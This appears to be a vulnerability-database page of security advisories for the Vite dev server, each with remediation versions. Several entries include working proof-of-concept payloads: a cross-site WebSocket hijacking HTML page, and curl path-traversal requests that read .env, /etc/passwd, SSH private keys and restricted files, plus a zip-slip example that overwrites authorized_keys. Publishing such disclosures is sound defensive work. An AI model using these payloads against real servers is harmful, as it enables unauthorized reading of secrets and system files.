Find, fix and prevent vulnerabilities in your code.

Overview

vite is a Native-ESM powered web dev build tool

Affected versions of this package are vulnerable to Origin Validation Error due to default CORS settings and lack of validation on the Origin header for WebSocket connections, making any websites able to send any requests to the development server and read the response. An attacker can intercept and manipulate requests by sending crafted WebSocket requests from unauthorized origins.

Note:

Additionally to upgrading to a fixed version, the following configurations need to be made to fix the vulnerability:

1. If the backend integration feature is used and server.origin is not set, the origin of the backend server needs to be added to the server.cors.origin option. Make sure to set a specific origin rather than *, otherwise any origin can access your development server;

2. If a reverse proxy is used in front of Vite and requests are sent to Vite with a hostname other than localhost or *.localhost, the hostname needs to be added to the new server.allowedHosts option. For example, if the reverse proxy is sending requests to http://vite:5173, vite needs to be added to the server.allowedHosts option;

3. If the development server is accessed via a domain other than localhost or *.localhost the hostname needs to be added to the new server.allowedHosts option. For example, if you are accessing the development server via http://foo.example.com:8080, you need to add foo.example.com to the server.allowedHosts option;

4. If a plugin / framework is used that connects to the WebSocket server on their own from the browser and the WebSocket connection appears not to be working after upgrading to a fixed version, it is recommended to either fix the plugin / framework code to the make it compatible with the new version or to set legacy.skipWebSocketTokenCheck: true to opt-out the fix for "Lack of validation on the Origin header for WebSocket connections" while the plugin / framework is incompatible with the new version of Vite. When enabling this option, make sure that you are aware of the security implications of this vulnerability.

Workaround

This vulnerability can be partially mitigated by:

1. Setting server.cors to false or limiting server.cors.origin to trusted origins;

2. Using Chrome 94+ or using HTTPS for the development server.

PoC

1. Use the react template which utilizes HMR functionality:

npm create vite@latest my-vue-app-react -- --template react

2. On a malicious server, serve the following POC html:

<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <title>vite CSWSH</title>
    </head>
    <body>
        <div id="logs"></div>
        <script>
            const div = document.querySelectorAll('#logs')[0];
            const ws = new WebSocket('ws://localhost:5173','vite-hmr');
            ws.onmessage = event => {
                const logLine = document.createElement('p');
                logLine.innerHTML = event.data;
                div.append(logLine);
            };
        </script>
    </body>
</html>

3. Kick off Vite:

npm run dev

4. Load the development server (open http://localhost:5173/) as well as the malicious page in the browser;

5. Edit src/App.jsx file and intentionally place a syntax error;

6. Notice how the malicious page can view the websocket messages and a snippet of the source code is exposed.

Remediation

Upgrade vite to version 4.5.6, 5.4.12, 6.0.9 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub Commit

Overview

vite is a Native-ESM powered web dev build tool

Affected versions of this package are vulnerable to Directory Traversal through the server.fs.deny configuration due to improper input sanitization. An attacker can bypass server.fs.deny with /. for files under project root and access sensitive files by manipulating path traversal sequences.

Note:

This is only exploitable if the application is explicitly exposing the Vite dev server to the network (using --host or server.host config option). Only files that are under project root and are denied by a file matching pattern can be bypassed.

PoC

npm create vite@latest
cd vite-project/
cat "secret" > .env
npm install
npm run dev
curl --request-target /.env/. http://localhost:5173

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

• Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

• Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade vite to version 4.5.14, 5.4.19, 6.1.6, 6.2.7, 6.3.4 or higher.

References

• GitHub Commit

Overview

vite is a Native-ESM powered web dev build tool

Affected versions of this package are vulnerable to Information Exposure due to the handling of req.url which may contain unexpected characters such as #. An attacker can access and retrieve the contents of arbitrary files by sending specially crafted requests that bypass the server.fs.deny checks.

Note:

This is only exploitable if the Vite dev server is explicitly exposed to the network and running on Node or Bun runtimes, excluding Deno.

PoC

npm create vite@latest
cd vite-project/
npm install
npm run dev

send request to read /etc/passwd

curl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173

Remediation

Upgrade vite to version 4.5.13, 5.4.18, 6.0.15, 6.1.5, 6.2.6 or higher.

References

• GitHub Commit

Overview

vite is a Native-ESM powered web dev build tool

Affected versions of this package are vulnerable to Access Control Bypass through the server.fs.deny configuration, which is bypassed when using ?import query with inline and raw parameters. An attacker can read arbitrary files and return their content if they exist by crafting a URL that includes specific query parameters.

Remediation

Upgrade vite to version 4.5.11, 5.4.16, 6.0.13, 6.1.3, 6.2.4 or higher.

References

• GitHub Commit
• Nuclei Templates

Overview

vite is a Native-ESM powered web dev build tool

Affected versions of this package are vulnerable to Incorrect Authorization due to missing checks in transformMiddleware() which ignore certain query parameters. An attacker can access unauthorized files by including a ?raw?? or ?import&raw?? URL parameter. The allow list used by server.fs.deny() is not checked when handling these queries and the file contents are returned.

Note: The dev server is configured by default to be inaccessible. This is only exploitable if the dev server is exposed to the network with either the --host command line option or server.host config option.

PoC

$ echo "top secret content" > /tmp/secret.txt

# expected behavior
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"

Remediation

Upgrade vite to version 4.5.10, 5.4.15, 6.0.12, 6.1.2, 6.2.3 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Commit
• Nuclei Templates
• Exploit DB
• PoC in GitHub